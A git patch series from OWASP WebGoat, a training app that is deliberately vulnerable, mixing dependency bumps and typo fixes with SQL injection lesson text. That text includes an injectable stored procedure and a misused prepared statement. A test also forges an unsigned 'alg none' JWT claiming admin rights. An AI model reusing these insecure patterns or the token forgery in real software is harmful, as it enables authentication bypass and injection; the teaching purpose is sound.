From 87358d4238b7babd4acd3cb1180e4ca0241bc9d5 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 13 Oct 2022 09:15:20 +0000
Subject: [PATCH 205/227] Bump docker/setup-qemu-action from 2.0.0 to 2.1.0

Bumps [docker/setup-qemu-action](https://github.com/docker/setup-qemu-action) from 2.0.0 to 2.1.0.
- [Release notes](https://github.com/docker/setup-qemu-action/releases)
- [Commits](https://github.com/docker/setup-qemu-action/compare/v2.0.0...v2.1.0)

---
updated-dependencies:
- dependency-name: docker/setup-qemu-action
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 .github/workflows/release.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 3b75bfedc..6fb7eecab 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -74,7 +74,7 @@ jobs:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
 
       - name: "Set up QEMU"
-        uses: docker/setup-qemu-action@v2.0.0
+        uses: docker/setup-qemu-action@v2.1.0
         with:
           platforms: all
 

From d4e3c9b91cbb1dec2caa9d427164d68b09d330d8 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Fri, 14 Oct 2022 09:07:35 +0000
Subject: [PATCH 206/227] Bump actions/cache from 3.0.10 to 3.0.11

Bumps [actions/cache](https://github.com/actions/cache) from 3.0.10 to 3.0.11.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v3.0.10...v3.0.11)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 .github/workflows/build.yml   | 4 ++--
 .github/workflows/release.yml | 2 +-
 .github/workflows/test.yml    | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 392450b9a..412993e49 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -42,7 +42,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.10
+        uses: actions/cache@v3.0.11
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
@@ -63,7 +63,7 @@ jobs:
               java-version: 17
               architecture: x64
         - name: Cache Maven packages
-          uses: actions/cache@v3.0.10
+          uses: actions/cache@v3.0.11
           with:
               path: ~/.m2
               key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 6fb7eecab..7dfeea288 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -25,7 +25,7 @@ jobs:
           architecture: x64
 
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.10
+        uses: actions/cache@v3.0.11
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index 147b36a0a..66eedfb37 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -40,7 +40,7 @@ jobs:
                   architecture: x64
             #Uses an action to set up a cache using a certain key based on the hash of the dependencies
             - name: Cache Maven packages
-              uses: actions/cache@v3.0.10
+              uses: actions/cache@v3.0.11
               with:
                   path: ~/.m2
                   key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}

From b51be74cab8de1bdf2566f3c1ab9e6ecad385403 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Andr=C3=A1s=20Veres-Szentkir=C3=A1lyi?= <vsza@vsza.hu>
Date: Mon, 28 Nov 2022 15:07:50 +0100
Subject: [PATCH 207/227] typofix

---
 .../sqlinjection/documentation/SqlInjection_content6a.adoc      | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content6a.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content6a.adoc
index 2ce8dcced..8bd6d543e 100644
--- a/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content6a.adoc
+++ b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content6a.adoc
@@ -28,4 +28,4 @@ CREATE TABLE user_system_data (userid int not null primary key,
 *6.b)* When you have figured it out.... What is Dave's password?
 
 Note: There are multiple ways to solve this Assignment. One is by using a UNION, the other by appending
-a new SQl statement. Maybe you can find both of them.
\ No newline at end of file
+a new SQL statement. Maybe you can find both of them.

From 8db9ff30be29824c7ddbea696af029cd36d1f81c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Andr=C3=A1s=20Veres-Szentkir=C3=A1lyi?= <vsza@vsza.hu>
Date: Tue, 29 Nov 2022 15:15:11 +0100
Subject: [PATCH 208/227] Fixed incorrect word

while "wear" and "were" have similar pronunciation, one of them is better here than the other :)
---
 .../lessons/passwordreset/SecurityQuestionAssignment.java       | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/main/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignment.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignment.java
index 83af61934..882b47bd2 100644
--- a/src/main/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignment.java
@@ -63,7 +63,7 @@ public class SecurityQuestionAssignment extends AssignmentEndpoint {
         questions.put("What are the last 5 digits of your drivers license?", "Is subject to change, and the last digit of your driver license might follow a specific pattern. (For example your birthday).");
         questions.put("What was your childhood nickname?", "Not all people had a nickname.");
         questions.put("Who was your childhood hero?", "Most Heroes we had as a child where quite obvious ones, like Superman for example.");
-        questions.put("On which wrist do you were your watch?", "There are only to possible real answers, so really easy to guess.");
+        questions.put("On which wrist do you wear your watch?", "There are only to possible real answers, so really easy to guess.");
         questions.put("What is your favorite color?", "Can easily be guessed.");
     }
 

From 71ec36102f107026bf6c92137c6d09d40cb4dc62 Mon Sep 17 00:00:00 2001
From: Adam Szatyin <szatyinadam@gmail.com>
Date: Wed, 30 Nov 2022 15:27:58 +0100
Subject: [PATCH 209/227] Fix typo

---
 .../sqlinjection/documentation/SqlInjection_content8.adoc       | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content8.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content8.adoc
index d357ea7ba..dbe6538e6 100644
--- a/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content8.adoc
+++ b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content8.adoc
@@ -14,7 +14,7 @@ EXEC ListCustomers ‘USA’
 
 === Injectable Stored Procedure (Microsoft SQL Server)
 -------------------------------------------------------
-CREATE PROEDURE getUser(@lastName nvarchar(25)) 
+CREATE PROCEDURE getUser(@lastName nvarchar(25)) 
 AS 
 declare @sql nvarchar(255)
 set @sql = 'SELECT * FROM users WHERE

From 6a18ee80bec095f5ec815759a36f58e3418f98db Mon Sep 17 00:00:00 2001
From: "aswins2108@gmail.com" <aswins2108@gmail.com>
Date: Tue, 6 Dec 2022 12:54:23 +0530
Subject: [PATCH 210/227] Added info about login in the ReadMe file

---
 README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/README.md b/README.md
index fba54fa9e..7bfae574d 100644
--- a/README.md
+++ b/README.md
@@ -95,6 +95,8 @@ Now we are ready to run the project. WebGoat 8.x is using Spring-Boot.
 ```
 ... you should be running WebGoat on http://localhost:8080/WebGoat momentarily.
 
+Note: The above link will redirect you to login page if you are not logged in. LogIn/Create account to proceed.
+
 
 To change the IP address add the following variable to the `WebGoat/webgoat-container/src/main/resources/application.properties` file:
 

From 9abf4ef2eade27aaa9e2668bed85b745a7ff1dc8 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Tue, 27 Dec 2022 18:00:54 +0100
Subject: [PATCH 211/227] Bump actions/cache from 3.0.11 to 3.2.1 (#1368)

Bumps [actions/cache](https://github.com/actions/cache) from 3.0.11 to 3.2.1.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v3.0.11...v3.2.1)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/build.yml   | 4 ++--
 .github/workflows/release.yml | 2 +-
 .github/workflows/test.yml    | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 412993e49..3ba26a102 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -42,7 +42,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.11
+        uses: actions/cache@v3.2.1
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
@@ -63,7 +63,7 @@ jobs:
               java-version: 17
               architecture: x64
         - name: Cache Maven packages
-          uses: actions/cache@v3.0.11
+          uses: actions/cache@v3.2.1
           with:
               path: ~/.m2
               key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 7dfeea288..1a3652c45 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -25,7 +25,7 @@ jobs:
           architecture: x64
 
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.11
+        uses: actions/cache@v3.2.1
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index 66eedfb37..4ffc21a4b 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -40,7 +40,7 @@ jobs:
                   architecture: x64
             #Uses an action to set up a cache using a certain key based on the hash of the dependencies
             - name: Cache Maven packages
-              uses: actions/cache@v3.0.11
+              uses: actions/cache@v3.2.1
               with:
                   path: ~/.m2
                   key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}

From 614235d91385bc9bcc65eb85ad3fe20d14245d5f Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Sat, 31 Dec 2022 16:28:31 +0100
Subject: [PATCH 212/227] Bump actions/cache from 3.2.1 to 3.2.2 (#1369)

Bumps [actions/cache](https://github.com/actions/cache) from 3.2.1 to 3.2.2.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v3.2.1...v3.2.2)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/build.yml   | 4 ++--
 .github/workflows/release.yml | 2 +-
 .github/workflows/test.yml    | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 3ba26a102..5376ac9b1 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -42,7 +42,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v3.2.1
+        uses: actions/cache@v3.2.2
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
@@ -63,7 +63,7 @@ jobs:
               java-version: 17
               architecture: x64
         - name: Cache Maven packages
-          uses: actions/cache@v3.2.1
+          uses: actions/cache@v3.2.2
           with:
               path: ~/.m2
               key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 1a3652c45..192ce8fe4 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -25,7 +25,7 @@ jobs:
           architecture: x64
 
       - name: Cache Maven packages
-        uses: actions/cache@v3.2.1
+        uses: actions/cache@v3.2.2
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index 4ffc21a4b..09b0de5d3 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -40,7 +40,7 @@ jobs:
                   architecture: x64
             #Uses an action to set up a cache using a certain key based on the hash of the dependencies
             - name: Cache Maven packages
-              uses: actions/cache@v3.2.1
+              uses: actions/cache@v3.2.2
               with:
                   path: ~/.m2
                   key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}

From 32468ff90bcf3186a32d8f17a6ee6f2741c67b05 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 4 Jan 2023 07:42:29 +0100
Subject: [PATCH 213/227] Add sql lesson (#1370)

---
 .gitignore                                    |  2 ++
 .../documentation/SqlInjection_challenge.adoc |  4 +--
 .../documentation/SqlInjection_content9.adoc  | 32 +++++++++++++++++--
 3 files changed, 33 insertions(+), 5 deletions(-)

diff --git a/.gitignore b/.gitignore
index 954e779fa..f914d3ab7 100644
--- a/.gitignore
+++ b/.gitignore
@@ -55,3 +55,5 @@ webgoat.script
 TestClass.class
 **/*.flattened-pom.xml
 /.gitconfig
+
+webgoat.gitconfig
\ No newline at end of file
diff --git a/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_challenge.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_challenge.adoc
index 8a8a7ce78..2e7d5562c 100644
--- a/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_challenge.adoc
+++ b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_challenge.adoc
@@ -1,6 +1,6 @@
 We now explained the basic steps involved in an SQL injection. In this assignment you will need to combine all
 the things we explained in the SQL lessons.
 
-Goal: Can you login as Tom?
+Goal: Can you log in as Tom?
 
-Have fun!
\ No newline at end of file
+Have fun!
diff --git a/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content9.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content9.adoc
index 9bada4c64..2e2fc9a45 100644
--- a/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content9.adoc
+++ b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content9.adoc
@@ -1,4 +1,5 @@
 == Parameterized Queries - Java Snippet
+
 [source,java]
 ----
 public static bool isUsernameValid(string username) {
@@ -12,14 +13,39 @@ RecordSet rs = null;
 try {
     pUserName = request.getParameter("UserName");
     if ( isUsernameValid (pUsername) ) {
-        ps = conn.prepareStatement("SELECT * FROM user_table
-                                   WHERE username = ? ");
+        ps = conn.prepareStatement("SELECT * FROM user_table WHERE username = ? ");
         ps.setString(1, pUsername);
         rs = ps.execute();
         if ( rs.next() ) {
             // do the work of making the user record active in some way
         }
-    } else { // handle invalid input }
+    } else {
+        // handle invalid input
+    }
 }
 catch (...) { // handle all exceptions ... }
 ----
+
+== Important
+
+Use the prepared statement correctly; parameters should be set with `ps.set..()` and DO NOT use the following statement:
+
+[source,java]
+----
+String insertStatement = "INSERT INTO USERS (id, name, email) VALUES (%s, %s, %s)".format("1", "webgoat", "webgoat@owasp.org");
+PreparedStatement statement = conn.prepareStatement(insertStatement);
+statement.executeUpdate();
+----
+
+(For the sake of the example, we assume that the passed values are based on user input).
+The example above is not the correct way to use a prepared statement, use:
+
+[source,java]
+----
+PreparedStatement statement = conn.prepareStatement("INSERT INTO USERS (id, name, email) VALUES (?, ?, ?)");
+statement.setString(1, "1");
+statement.setString(2, "webgoat");
+statement.setString(3, "webgoat@owasp.org");
+statement.executeUpdate();
+----
+

From b03777d39b0fa43fedced4b57a9094575843a4fc Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 2 Jan 2023 08:47:45 +0100
Subject: [PATCH 214/227] Support `boolean` when parsing the token.

When the admin json element passes as a `boolean`:

```
{
 "admin": true
}
```

the parsing is now successful.
---
 .../webgoat/lessons/jwt/JWTVotesEndpoint.java |  2 +-
 .../lessons/jwt/JWTVotesEndpointTest.java     | 19 ++++++++++++++++---
 2 files changed, 17 insertions(+), 4 deletions(-)

diff --git a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpoint.java
index 1c71a1e47..c0afdb69f 100644
--- a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpoint.java
@@ -169,7 +169,7 @@ public class JWTVotesEndpoint extends AssignmentEndpoint {
             try {
                 Jwt jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(accessToken);
                 Claims claims = (Claims) jwt.getBody();
-                boolean isAdmin = Boolean.valueOf((String) claims.get("admin"));
+                boolean isAdmin = Boolean.valueOf(String.valueOf(claims.get("admin")));
                 if (!isAdmin) {
                     return failed(this).feedback("jwt-only-admin").build();
                 } else {
diff --git a/src/test/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpointTest.java
index 8cca4a7cf..b2bddb59e 100644
--- a/src/test/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpointTest.java
@@ -28,12 +28,9 @@ import io.jsonwebtoken.Jwts;
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
 import org.owasp.webgoat.container.plugins.LessonTest;
 import org.owasp.webgoat.lessons.jwt.JWT;
-import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.MvcResult;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
@@ -75,6 +72,22 @@ public class JWTVotesEndpointTest extends LessonTest {
                 .andExpect(jsonPath("$.lessonCompleted", is(true)));
     }
 
+    @Test
+    public void solveAssignmentWithBoolean() throws Exception {
+        //Create new token and set alg to none and do not sign it
+        Claims claims = Jwts.claims();
+        claims.put("admin", true);
+        claims.put("user", "Tom");
+        String token = Jwts.builder().setClaims(claims).setHeaderParam("alg", "none").compact();
+
+        //Call the reset endpoint
+        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings")
+                .contentType(MediaType.APPLICATION_JSON)
+                .cookie(new Cookie("access_token", token)))
+                .andExpect(status().isOk())
+                .andExpect(jsonPath("$.lessonCompleted", is(true)));
+    }
+
     @Test
     public void resetWithoutTokenShouldNotWork() throws Exception {
         mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings")

From d2a1546dff969702afe666f9d0ed19197df0a9e4 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 4 Jan 2023 08:07:23 +0100
Subject: [PATCH 215/227] Apply formatting

This will make sure we have a consistent style across our project and the PRs are only concerned with actual changes and no longer about style.
---
 .github/stale.yml                             |    4 +-
 .github/workflows/build.yml                   |    5 +
 CONTRIBUTING.md                               |   37 +-
 CREATE_RELEASE.md                             |   14 +-
 PULL_REQUEST_TEMPLATE.md                      |    2 +-
 README.md                                     |    9 +-
 README_I18N.md                                |    2 +-
 RELEASE_NOTES.md                              |   45 +-
 docs/README.md                                |    1 -
 pom.xml                                       | 1360 +++++++++--------
 robot/README.md                               |   19 +-
 .../framework/VulnerableTaskHolder.java       |  118 +-
 .../AjaxAuthenticationEntryPoint.java         |   80 +-
 .../AsciiDoctorTemplateResolver.java          |  234 +--
 .../container/DatabaseConfiguration.java      |   89 +-
 .../owasp/webgoat/container/HammerHead.java   |   61 +-
 .../webgoat/container/LessonDataSource.java   |   96 +-
 .../container/LessonTemplateResolver.java     |  106 +-
 .../webgoat/container/MvcConfiguration.java   |  354 +++--
 .../org/owasp/webgoat/container/WebGoat.java  |   77 +-
 .../webgoat/container/WebSecurityConfig.java  |  126 +-
 .../webgoat/container/WebWolfRedirect.java    |   12 +-
 .../asciidoc/EnvironmentExposure.java         |   19 +-
 .../asciidoc/OperatingSystemMacro.java        |   28 +-
 .../container/asciidoc/UsernameMacro.java     |   38 +-
 .../asciidoc/WebGoatTmpDirMacro.java          |   29 +-
 .../asciidoc/WebGoatVersionMacro.java         |   28 +-
 .../container/asciidoc/WebWolfMacro.java      |  112 +-
 .../container/asciidoc/WebWolfRootMacro.java  |   26 +-
 .../assignments/AssignmentEndpoint.java       |   95 +-
 .../assignments/AssignmentHints.java          |    6 +-
 .../container/assignments/AssignmentPath.java |   13 +-
 .../container/assignments/AttackResult.java   |  168 +-
 .../assignments/LessonTrackerInterceptor.java |   67 +-
 .../container/controller/StartLesson.java     |  113 +-
 .../webgoat/container/controller/Welcome.java |   76 +-
 .../webgoat/container/i18n/Language.java      |   15 +-
 .../webgoat/container/i18n/Messages.java      |   37 +-
 .../container/i18n/PluginMessages.java        |   79 +-
 .../webgoat/container/lessons/Assignment.java |   85 +-
 .../webgoat/container/lessons/Category.java   |  100 +-
 .../lessons/CourseConfiguration.java          |  157 +-
 .../owasp/webgoat/container/lessons/Hint.java |   24 +-
 .../container/lessons/Initializeable.java     |    6 +-
 .../webgoat/container/lessons/Lesson.java     |  176 +--
 .../LessonConnectionInvocationHandler.java    |   45 +-
 .../container/lessons/LessonInfoModel.java    |   11 +-
 .../container/lessons/LessonMenuItem.java     |  266 ++--
 .../container/lessons/LessonMenuItemType.java |   26 +-
 .../container/lessons/LessonScanner.java      |   52 +-
 .../container/service/EnvironmentService.java |   11 +-
 .../container/service/HintService.java        |   58 +-
 .../container/service/LabelDebugService.java  |  129 +-
 .../container/service/LabelService.java       |   80 +-
 .../container/service/LessonInfoService.java  |   27 +-
 .../container/service/LessonMenuService.java  |  173 +--
 .../service/LessonProgressService.java        |   64 +-
 .../container/service/LessonTitleService.java |   34 +-
 .../container/service/ReportCardService.java  |  140 +-
 .../service/RestartLessonService.java         |   39 +-
 .../container/service/SessionService.java     |   22 +-
 .../webgoat/container/session/Course.java     |  135 +-
 .../container/session/LabelDebugger.java      |   56 +-
 .../container/session/UserSessionData.java    |   46 +-
 .../webgoat/container/session/WebSession.java |  127 +-
 .../container/users/LessonTracker.java        |  163 +-
 .../users/RegistrationController.java         |   47 +-
 .../webgoat/container/users/Scoreboard.java   |  104 +-
 .../webgoat/container/users/UserForm.java     |   31 +-
 .../container/users/UserRepository.java       |   10 +-
 .../webgoat/container/users/UserService.java  |   67 +-
 .../webgoat/container/users/UserSession.java  |    5 +-
 .../webgoat/container/users/UserTracker.java  |  179 +--
 .../users/UserTrackerRepository.java          |    3 +-
 .../container/users/UserValidator.java        |   30 +-
 .../webgoat/container/users/WebGoatUser.java  |  124 +-
 .../authbypass/AccountVerificationHelper.java |  105 +-
 .../lessons/authbypass/AuthBypass.java        |   16 +-
 .../lessons/authbypass/VerifyAccount.java     |   98 +-
 .../BypassRestrictions.java                   |   16 +-
 .../BypassRestrictionsFieldRestrictions.java  |   43 +-
 .../BypassRestrictionsFrontendValidation.java |   78 +-
 .../lessons/challenges/ChallengeIntro.java    |   16 +-
 .../webgoat/lessons/challenges/Email.java     |   15 +-
 .../webgoat/lessons/challenges/Flag.java      |   75 +-
 .../lessons/challenges/SolutionConstants.java |    8 +-
 .../challenges/challenge1/Assignment1.java    |   71 +-
 .../challenges/challenge1/Challenge1.java     |   16 +-
 .../challenges/challenge1/ImageServlet.java   |   51 +-
 .../challenges/challenge5/Assignment5.java    |   59 +-
 .../challenges/challenge5/Challenge5.java     |   16 +-
 .../challenges/challenge7/Assignment7.java    |  111 +-
 .../challenges/challenge7/Challenge7.java     |   16 +-
 .../lessons/challenges/challenge7/MD5.java    | 1279 ++++++++--------
 .../challenge7/PasswordResetLink.java         |   52 +-
 .../challenges/challenge8/Assignment8.java    |   89 +-
 .../challenges/challenge8/Challenge8.java     |   16 +-
 .../chromedevtools/ChromeDevTools.java        |   16 +-
 .../lessons/chromedevtools/NetworkDummy.java  |   20 +-
 .../lessons/chromedevtools/NetworkLesson.java |   32 +-
 .../org/owasp/webgoat/lessons/cia/CIA.java    |   16 +-
 .../owasp/webgoat/lessons/cia/CIAQuiz.java    |   59 +-
 .../ClientSideFiltering.java                  |   47 +-
 .../ClientSideFilteringAssignment.java        |   21 +-
 .../ClientSideFilteringFreeAssignment.java    |   22 +-
 .../lessons/clientsidefiltering/Salaries.java |  137 +-
 .../clientsidefiltering/ShopEndpoint.java     |   79 +-
 .../lessons/cryptography/CryptoUtil.java      |  208 +--
 .../lessons/cryptography/Cryptography.java    |   17 +-
 .../cryptography/EncodingAssignment.java      |   70 +-
 .../cryptography/HashingAssignment.java       |  133 +-
 .../SecureDefaultsAssignment.java             |   38 +-
 .../cryptography/SigningAssignment.java       |   96 +-
 .../cryptography/XOREncodingAssignment.java   |   16 +-
 .../org/owasp/webgoat/lessons/csrf/CSRF.java  |   18 +-
 .../lessons/csrf/CSRFConfirmFlag1.java        |   34 +-
 .../webgoat/lessons/csrf/CSRFFeedback.java    |  129 +-
 .../webgoat/lessons/csrf/CSRFGetFlag.java     |   92 +-
 .../owasp/webgoat/lessons/csrf/CSRFLogin.java |   42 +-
 .../webgoat/lessons/csrf/ForgedReviews.java   |  131 +-
 .../owasp/webgoat/lessons/csrf/Review.java    |   12 +-
 .../InsecureDeserialization.java              |   47 +-
 .../InsecureDeserializationTask.java          |   84 +-
 .../deserialization/SerializationHelper.java  |   73 +-
 .../lessons/hijacksession/HijackSession.java  |   16 +-
 .../HijackSessionAssignment.java              |   67 +-
 .../hijacksession/cas/Authentication.java     |   45 +-
 .../cas/AuthenticationProvider.java           |    6 +-
 .../HijackSessionAuthenticationProvider.java  |   84 +-
 .../lessons/htmltampering/HtmlTampering.java  |   47 +-
 .../htmltampering/HtmlTamperingTask.java      |   14 +-
 .../lessons/httpbasics/HttpBasics.java        |   16 +-
 .../lessons/httpbasics/HttpBasicsLesson.java  |   22 +-
 .../lessons/httpbasics/HttpBasicsQuiz.java    |   31 +-
 .../HttpBasicsInterceptRequest.java           |   34 +-
 .../lessons/httpproxies/HttpProxies.java      |   47 +-
 .../org/owasp/webgoat/lessons/idor/IDOR.java  |   47 +-
 .../lessons/idor/IDORDiffAttributes.java      |   36 +-
 .../lessons/idor/IDOREditOtherProfiile.java   |  120 +-
 .../owasp/webgoat/lessons/idor/IDORLogin.java |   67 +-
 .../lessons/idor/IDORViewOtherProfile.java    |   68 +-
 .../lessons/idor/IDORViewOwnProfile.java      |   55 +-
 .../idor/IDORViewOwnProfileAltUrl.java        |   58 +-
 .../webgoat/lessons/idor/UserProfile.java     |  185 +--
 .../lessons/insecurelogin/InsecureLogin.java  |   47 +-
 .../insecurelogin/InsecureLoginTask.java      |   24 +-
 .../org/owasp/webgoat/lessons/jwt/JWT.java    |   16 +-
 .../lessons/jwt/JWTDecodeEndpoint.java        |   16 +-
 .../webgoat/lessons/jwt/JWTFinalEndpoint.java |  118 +-
 .../owasp/webgoat/lessons/jwt/JWTQuiz.java    |   55 +-
 .../lessons/jwt/JWTRefreshEndpoint.java       |  187 +--
 .../lessons/jwt/JWTSecretKeyEndpoint.java     |   88 +-
 .../webgoat/lessons/jwt/JWTVotesEndpoint.java |  263 ++--
 .../webgoat/lessons/jwt/votes/Views.java      |    6 +-
 .../owasp/webgoat/lessons/jwt/votes/Vote.java |   77 +-
 .../lessontemplate/LessonTemplate.java        |   16 +-
 .../lessons/lessontemplate/SampleAttack.java  |   85 +-
 .../lessons/logging/LogBleedingTask.java      |   48 +-
 .../webgoat/lessons/logging/LogSpoofing.java  |   47 +-
 .../lessons/logging/LogSpoofingTask.java      |   28 +-
 .../lessons/missingac/DisplayUser.java        |   76 +-
 .../MissingAccessControlUserRepository.java   |   62 +-
 .../lessons/missingac/MissingFunctionAC.java  |   20 +-
 .../MissingFunctionACHiddenMenus.java         |   45 +-
 .../missingac/MissingFunctionACUsers.java     |  121 +-
 .../missingac/MissingFunctionACYourHash.java  |   36 +-
 .../MissingFunctionACYourHashAdmin.java       |   50 +-
 .../owasp/webgoat/lessons/missingac/User.java |    6 +-
 .../lessons/passwordreset/PasswordReset.java  |   16 +-
 .../passwordreset/PasswordResetEmail.java     |   15 +-
 .../passwordreset/QuestionsAssignment.java    |   58 +-
 .../passwordreset/ResetLinkAssignment.java    |  160 +-
 .../ResetLinkAssignmentForgotPassword.java    |  114 +-
 .../SecurityQuestionAssignment.java           |  103 +-
 .../passwordreset/SimpleMailAssignment.java   |  119 +-
 .../lessons/passwordreset/TriedQuestions.java |   19 +-
 .../resetlink/PasswordChangeForm.java         |   13 +-
